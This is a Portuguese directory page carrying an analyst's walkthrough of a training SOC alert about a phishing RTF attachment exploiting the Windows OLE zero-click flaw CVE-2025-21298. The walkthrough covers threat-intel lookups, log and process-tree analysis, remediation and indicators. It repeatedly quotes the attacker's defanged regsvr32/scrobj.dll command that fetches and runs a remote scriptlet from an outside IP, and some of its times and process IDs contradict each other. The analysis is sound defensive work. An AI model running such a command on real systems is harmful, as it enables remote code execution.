Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298 — SOC336 - Exploração de RCE Zero-Click do Windows OLE Detectada (CVE-2025-21298) Walkthrough | Kitploit
Ferramentas/GitHubGitHub/abc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298
Análise de VulnerabilidadesExploraçãoMovimento LateralEngenharia ReversaAnálise ForensePhishingAnálise de MalwareComando e ControleInteligência de Ameaças
Aprendizado e Educação
Resposta a Incidentes
Segurança de Email
GitHubabc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298

SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298

SOC336 - Exploração de RCE Zero-Click do Windows OLE Detectada (CVE-2025-21298) Walkthrough

Ver RepositórioSite
6há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

LinkedIn Gmail Instagram Old Discord Reddit


SOC336 - Exploração de RCE Zero-Click OLE do Windows Detectada (CVE-2025-21298) - Passo a Passo

e-mail de phishing

🔎 Índice
  1. Situação
  • Visão Geral do Alerta
  • Ferramentas Utilizadas
  • Análise
    • Segurança de E-mail
    • Gerenciamento de Logs
      • Log de Proxy
    • Segurança de Endpoint
      • Histórico do Terminal
      • Ação de Rede
      • Processos
      • CVE-2025-21298
  • Playbook
  • Nota do Analista
  • Referência
  • (Voltar ao Topo)

    Situação

    Um de nossos funcionários, Austin, recebeu um e-mail de phishing de um remetente suspeito e um alerta foi acionado depois que ele abriu o e-mail usando o Outlook em 04 de Fevereiro de 2025, às 16:18. O motivo do acionamento foi "Anexo RTF malicioso identificado com padrão de exploração CVE-2025-21298 conhecido" .

    (Voltar ao Topo)

    Visão Geral do Alerta

    imagem

    EventID : 314

    Hora do Evento : 04 de Fevereiro de 2025, 16:18 (Acho que estava errado)

    Regra : SOC336 - Exploração de RCE Zero-Click OLE do Windows Detectada (CVE-2025-21298)

    Nível : Analista de Segurança

    Endereço SMTP : 84.38.130.118

    Endereço de Origem : [email protected]

    Endereço de Destino : [email protected]

    Assunto do E-mail : Importante: Ação Necessária para Prazo de Projeto Futuro

    Anexo : mail.rtf

    Hash do Anexo : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184

    Ação do Dispositivo : Permitido

    Motivo do Acionamento : Anexo RTF malicioso identificado com padrão de exploração CVE-2025-21298 conhecido.

    (Voltar ao Topo)

    Ferramentas Utilizadas

    1. VirusTotal
    2. AbuseIPDB
    3. Gemini

    (Voltar ao Topo)

    Análise

    Vamos nos aprofundar na Segurança de E-mail, Gerenciamento de Logs e Logs de Segurança de Endpoint para a triagem do alerta.

    Segurança de E-mail

    Captura de tela 2026-05-27 151659

    Pesquisei o endereço do remetente projectmanagement@pm[.]me e cliquei no e-mail "Importante: Ação Necessária para Prazo de Projeto Futuro" enviado às 05:12 do mesmo dia, o que me pareceu estranho, pois o tom urgente e as palavras como "Importante" e "Ação Necessária" me deram a impressão de um e-mail de phishing.



    Captura de tela 2026-05-27 175944

    Pesquisei o domínio pm[.]me no VirusTotal e apenas 1 fornecedor o considerou suspeito.



    Captura de tela 2026-05-27 151915

    No entanto, quando pesquisei o endereço SMTP 84[.]38[.]130[.]118, 7 fornecedores o classificaram como Malicioso e Malware, e estava relacionado ao servidor C2 SILVER.



    Captura de tela 2026-05-27 180753
    Captura de tela 2026-05-27 180810

    84[.]38[.]130[.]118 também foi encontrado no banco de dados do AbuseIPDB. Ele está localizado em Riga, Riga, Letônia, pertence ao nome de domínio rixhost.lv e é categorizado como Ataque DDoS, Hacking e Host Explorado.



    Captura de tela 2026-05-27 152243

    Finalmente, pesquisei o hash df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 do anexo mail.rtf no VirusTotal e 29 dos 61 fornecedores classificaram o anexo como Malicioso. Ele pertence à família de malware rtfmalformb e foi associado à vulnerabilidade CVE-2025-21298.

    Foi confirmado que um e-mail de phishing com um anexo malicioso foi enviado para Austin.

    (Voltar ao Topo)

    Gerenciamento de Logs

    Vamos investigar se houve atividades suspeitas após as 05:12, quando Austin abriu o e-mail de phishing.

    Log de Proxy

    Captura de tela 2026-05-27 152515

    Primeiro, verifiquei o log de proxy e pesquisei o endereço IP malicioso do remetente 84[.]38[.]130[.]118, descobrindo que às 08:06 houve uma requisição HTTP GET para o endereço IP malicioso com a URL hxxp://84[.]38[.]130[.]118/shell[.]sct iniciada pelo cmd.exe, baixando um arquivo scriptlet do Windows. O código de resposta foi 200 OK, indicando que o tráfego de saída foi permitido e não bloqueado pelo firewall. Era incomum obter um arquivo de script que possivelmente continha um script de reverse shell.

    (Voltar ao Topo)

    Segurança de Endpoint

    Histórico do Terminal

    imagem
    Captura de tela 2026-05-27 153447

    Como o tráfego de saída para o endereço IP malicioso foi iniciado pelo cmd.exe, primeiro verifiquei o histórico do terminal e descobri que às 08:06:08 foi executado o comando "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" para gerar o regsvr32.exe e buscar o arquivo de script do endereço IP malicioso através do scrobj.dll

    • regsvr32.exe: um utilitário de linha de comando para registrar e cancelar o registro de controles OLE, como DLLs e controles ActiveX no Registro do Windows
    • /s: regsvr32.exe executado em segundo plano e silenciosamente
    • /u: força o Windows a não adicionar esta chave ao Registro do Windows
    • /i: interface
    • scrobj.dll: Biblioteca de Runtime de Objetos de Script que processa arquivos scriptlet

    Usar utilitários nativos do Windows para buscar o script pode deixar traços mínimos no sistema, dificultando o processo de engenharia reversa e análise de malware!

    (Voltar ao Topo)

    Ação de Rede

    Captura de tela 2026-05-27 153102

    Foi confirmado que houve uma conexão com o IP malicioso 84[.]38[.]130[.]118 às 08:06:42, após o evento de execução do comando.

    (Voltar ao Topo)

    Processos

    Então, por que o cmd.exe foi executado apenas ao clicar em um e-mail? Como não foi encontrada nenhuma evidência de download do anexo malicioso mail.rtf por Austin, verifiquei os logs do endpoint e pesquisei qualquer evento por volta das 08:06.

    Captura de tela 2026-05-27 153636

    ID do Processo: 7023

    Hora do Evento: 04 Fev 2025 08:06:25

    Linha de Comando: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

    Processo Pai: cmd.exe



    Captura de tela 2026-05-27 153616

    OK, então vamos ver o processo pai cmd.exe

    ID do Processo: 6784

    Hora do Evento: 04 Fev 2025 08:06:08

    Linha de Comando: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

    Processo Pai: outlook.exe



    Captura de tela 2026-05-27 154136

    E finalmente verifiquei o processo pai do outlook.exe

    ID do Processo: 4820

    Hora do Evento: 04 Fev 2025 08:05:15

    Linha de Comando: "C:\Windows\System32\cmd.exe"

    Processo Pai: explorer.exe



    Portanto, podemos concluir a árvore de processos maliciosos:

    explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ! Execução do Script !

    No entanto, ainda me questionava como os processos maliciosos foram iniciados sem baixar e abrir o anexo malicioso, e como o outlook.exe gerou o processo malicioso, até encontrar informações sobre a CVE-2025-21298.

    (Voltar ao Topo)

    CVE-2025-21298

    Captura de tela 2026-05-27 201652

    De acordo com o artigo da Offsec, havia uma vulnerabilidade crítica OLE Zero-Click no Windows que permitia RCE por e-mail com uma pontuação CVSS de 9.8 em Janeiro de 2025. Quando o destinatário alvo apenas abre ou visualiza o e-mail malicioso no Microsoft Outlook contendo um documento RTF prejudicial com um script incorporado , a vulnerabilidade é acionada, permitindo que o atacante execute código arbitrário no sistema afetado.

    Fiz algumas pesquisas sobre OLE do Windows e os processos de sequestro de documentos RTF no Google e Gemini, relacionados ao meu conhecimento de engenharia reversa:

    1. Ao abrir ou visualizar o documento RTF, a função UtOlePresStmToContentsStm dentro de ole32.dll aponta um objeto OLE para pstmContents para ler os dados da imagem em miniatura (OlePres) e despejá-los no arquivo de dados real (CONTENT).
    2. A função imediatamente aciona um erro de processamento inesperado devido ao formato corrompido do arquivo RTF do atacante, causando a exclusão do objeto OLE, mas não do ponteiro pstmContents.
    3. O arquivo RTF malicioso criou um objeto OLE malicioso contendo o código malicioso exatamente do mesmo tamanho do objeto OLE excluído, preenchendo o mesmo espaço de memória ainda apontado pelo ponteiro pstmContents.
    4. Após o Outlook terminar a visualização, ele executa o falso processo de "limpeza" contendo o código malicioso "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" dentro do objeto OLE falso malicioso.
    5. O sistema da vítima executa o payload remoto e estabelece um reverse shell automaticamente, sem nenhum clique.

    (Voltar ao Topo)

    Playbook

    Captura de tela 2026-05-28 144059
    Captura de tela 2026-05-28 144109
    Captura de tela 2026-05-28 144141
    Captura de tela 2026-05-28 144154
    Captura de tela 2026-05-28 144226
    Captura de tela 2026-05-28 144240

    Não em Quarentena

    Captura de tela 2026-05-28 144252

    Malicioso

    Captura de tela 2026-05-28 144306

    Acessado

    Captura de tela 2026-05-28 144316
    Captura de tela 2026-05-28 144343
    Captura de tela 2026-05-28 144730
    Captura de tela 2026-05-28 144804
    Captura de tela 2026-05-28 144844
    Captura de tela 2026-05-28 144940
    Captura de tela 2026-05-28 145001

    (Voltar ao Topo)

    Nota do Analista

    Classificação: Crítico

    Tipo: Malware

    Horário da Atividade:

    04 de Fevereiro de 2025, 05:12 (E-mail de phishing recebido)

    04 de Fevereiro de 2025, 08:05:15 - 04 de Fevereiro de 2025, 08:06:42 (E-mail de phishing aberto e código malicioso executado)

    Entidades Afetadas:

    Endereço de Origem: projectmanagement@pm[.]me

    Endereço SMTP: 84[.]38[.]130[.]118

    Endereço de E-mail do Destinatário: Austin@letsdefend[.]io

    Endereço IP do Destinatário: 172[.]16[.]17[.]137

    Nome do Host: Austin

    Motivos para Verdadeiro Positivo:

    Em 04 de Fevereiro de 2025, às 05:12, um e-mail suspeito com assunto "Importante: Ação Necessária para Prazo de Projeto Futuro" foi enviado de [email protected] (Endereço IP: 84.38.130.118) para [email protected] (Endereço IP: 172.16.17.137) com um anexo mail.rtf (hash SHA256: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184). O tom de urgência e as palavras usadas no assunto deram a impressão de um e-mail de phishing. As inteligencias de ameaças VirusTotal e AbuseIPDB classificaram o endereço IP do remetente, localizado em Riga, Riga, Letônia e pertencente ao nome de domínio rixhost.lv, e o anexo como maliciosos e malware.

    De acordo com os logs de proxy, às 08:06 houve uma requisição HTTP GET para o endereço IP malicioso com a URL hxxp://84[.]38[.]130[.]118/shell[.]sct iniciada pelo cmd.exe, baixando um arquivo scriptlet do Windows. O código de resposta foi 200 OK, indicando que o tráfego de saída para o endereço IP malicioso foi permitido e não bloqueado pelo firewall.

    De acordo com os logs de Segurança de Endpoint, o código malicioso "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023) foi iniciado pelo cmd.exe (PID: 6784) gerado a partir do outlook.exe (PID: 4820)

    A exploração foi causada por uma vulnerabilidade crítica OLE Zero-Click no Windows (CVE-2025-21298) que permite RCE por e-mail com uma pontuação CVSS de 9.8 em Janeiro de 2025. Quando o destinatário alvo apenas abre ou visualiza o e-mail malicioso no Microsoft Outlook contendo um documento RTF prejudicial com um script incorporado, a vulnerabilidade é acionada, permitindo que o atacante execute código arbitrário no sistema afetado, potencialmente estabelecendo um reverse shell para o servidor C2.

    Motivos para Escalação:

    Embora o tráfego de rede C2 ativo pós-exploração ainda não tenha sido observado de forma definitiva, os logs de segurança do endpoint confirmaram a execução do regsvr32.exe usando scrobj.dll para buscar o arquivo scriptlet shell.sct. Devido à pontuação CVSS de 9.8 da CVE-2025-21298, é necessária uma investigação adicional para verificar se há alguma atividade suspeita no host, como persistência ou exfiltração de dados.

    Remediações:

    • Desconectar imediatamente o host Austin da rede interna corporativa
    • Encerrar o processo de "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" e seus processos relacionados cmd.exe, outlook.exe
    • Bloquear o tráfego de saída para 84[.]38[.]130[.]118
    • Colocar na lista negra o domínio rixhost[.]lv
    • Colocar na lista negra o remetente projectmanagement@pm[.]me no servidor de e-mail
    • Corrigir a vulnerabilidade CVE-2025-21298
    • Redefinir as credenciais de Austin
    • Realizar Análise de Memória no host Austin para investigar as atividades maliciosas como conexão C2, persistência, exfiltração de dados após a execução do shell.sct
    • Realizar engenharia reversa no shell.sct
    • Realizar análise de e-mail para investigar o IP de origem, endereço de retorno no cabeçalho do e-mail
    • Bloquear o acesso à internet iniciado pelo regsvr32.exe
    • Realizar campanha de conscientização sobre phishing para educar os funcionários a não abrirem e-mails de remetentes desconhecidos ou com tom ou palavras de urgência

    Indicadores de Compromisso:

    • Endereço do remetente: projectmanagement@pm[.]me
    • Endereço IP do remetente: 84[.]38[.]130[.]118 Domínio do remetente: rixhost[.]lv
    • E-mail de phishing: "Important: Action Required for Upcoming Project Deadline"
    • Documento malicioso: mail.rtf (SHA256 hash: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184) Árvore de processos maliciosa: outlook.exe (PID: 4820) -> cmd.exe (PID: 6784) -> regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll (PID: 7023)
    • URL do segundo payload: hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll

    (Voltar ao topo)

    Referência

    CVE-2025-21298 Detalhes

    CVE-2025-21298: Uma Vulnerabilidade Crítica de Zero-Clique OLE do Windows

    (Voltar ao topo)

    Baixar ferramenta